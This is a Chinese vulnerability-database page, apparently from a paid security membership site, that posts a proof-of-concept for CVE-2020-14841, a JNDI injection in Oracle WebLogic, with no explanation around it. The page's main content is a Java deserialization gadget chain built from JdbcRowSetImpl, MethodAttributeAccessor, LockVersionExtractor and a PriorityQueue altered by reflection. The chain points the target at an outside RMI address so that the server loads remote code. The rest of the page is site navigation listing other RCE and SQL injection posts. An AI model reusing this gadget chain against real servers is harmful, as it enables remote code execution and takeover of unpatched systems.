CVE-2020-14841_weblogic_jndi_注入漏洞

010

# CVE-2020-14841 weblogic jndi 注入漏洞
==POC==

        // JdbcRowSetImpl
        JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
        jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");

        MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
        methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
        methodAttributeAccessor.setIsWriteOnly(true);
        methodAttributeAccessor.setAttributeName("UnicodeSec");


        LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");

        final ExtractorComparator comparator = new ExtractorComparator(extractor);
        final PriorityQueue queue = new PriorityQueue(2, comparator);


        Object[] q = new Object[]{jdbcRowSet, jdbcRowSet};
        Reflections.setFieldValue(queue, "queue", q);
        Reflections.setFieldValue(queue, "size", 2);

        Field comparatorF = queue.getClass().getDeclaredField("comparator");
        comparatorF.setAccessible(true);
        comparatorF.set(queue, new ExtractorComparator(extractor));

                    
        
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
漏洞库
    
    
喜欢就支持一下吧
点赞0赞赏
        分享

        

            

                
                
棉花糖的头像-棉花糖会员站糖心会员

                
            

            
会员必看手册(1.8.6版本 25.12.1更新)-棉花糖会员站
会员必看手册(1.8.6版本 25.12.1更新)
会员必看手册(1.8.6版本 25.12.1更新)
2025年12月1日 3.6W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 1.4W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 8531
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6161
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4552
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3703

        

    
    

        
    



            

                
相关推荐

            
2025 hw 有poc的漏洞集合-棉花糖会员站
2025 hw 有poc的漏洞集合
2025 hw 有poc的漏洞集合
2025年7月31日 6161
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 2397
百度网盘Windows客户端存在远程命令执行-棉花糖会员站
百度网盘Windows客户端存在远程命令执行
百度网盘Windows客户端存在远程命令执行
2025年9月4日 2273
大华 evo-runs/v1.0/receive RCE-棉花糖会员站
大华 evo-runs/v1.0/receive RCE
大华 evo-runs/v1.0/receive RCE
2025年7月11日 1950
wps 远程代码执行 rce-棉花糖会员站
wps 远程代码执行 rce
wps 远程代码执行 rce
2025年7月18日 1789
爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service
 存在远程命令执行
2025年7月4日 1683

	

		
评论			抢沙发

	


	

									

					
请登录后发表评论

					

						
											

									

									

			
    
				
    请登录后查看评论内容
    			

		

			


        
    
    

	
作者
用户封面

        

            

                
                
棉花糖的头像-棉花糖会员站糖心会员

                
            

            
CVE-2025-55182 dify 无条件rce
天地伟业Easy7 queryUserbyDesc 存在SQL注入
XWiki Platform 文件读取 (CVE-2025-55749)
安全渗透测试报告模板.doc
普华科技PowerPms ForgotPassword 存在sql注入
华天动力协同办公系统travelAjax存在SQL注入

        

    
最近一周热门文章
1会员必看手册(1.8.6版本 25.12.1更新)
棉花糖的头像-棉花糖会员站糖心会员2025年12月1日
3.6W+
2普华科技PowerPms ForgotPassword 存在sql注入
棉花糖的头像-棉花糖会员站糖心会员2025年12月3日
9999749
3无境靶场练习:win11通关vulntarget-b
ll_12345的头像-棉花糖会员站糖心会员2025年12月1日
728
4XWiki Platform 文件读取 (CVE-2025-55749)
棉花糖的头像-棉花糖会员站糖心会员2025年12月4日
9999694
5天地伟业Easy7 queryUserbyDesc 存在SQL注入
棉花糖的头像-棉花糖会员站糖心会员2025年12月4日
9999674
6OffSec OSCP培训 – PEN-200  2024.11 中英双语字幕
棉花糖的头像-棉花糖会员站糖心会员2025年12月2日
糖心会员会员专属672
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密




    


                    
                    
投稿文章发布帖子

                
扫码添加微信-棉花糖会员站
在手机上浏览此页面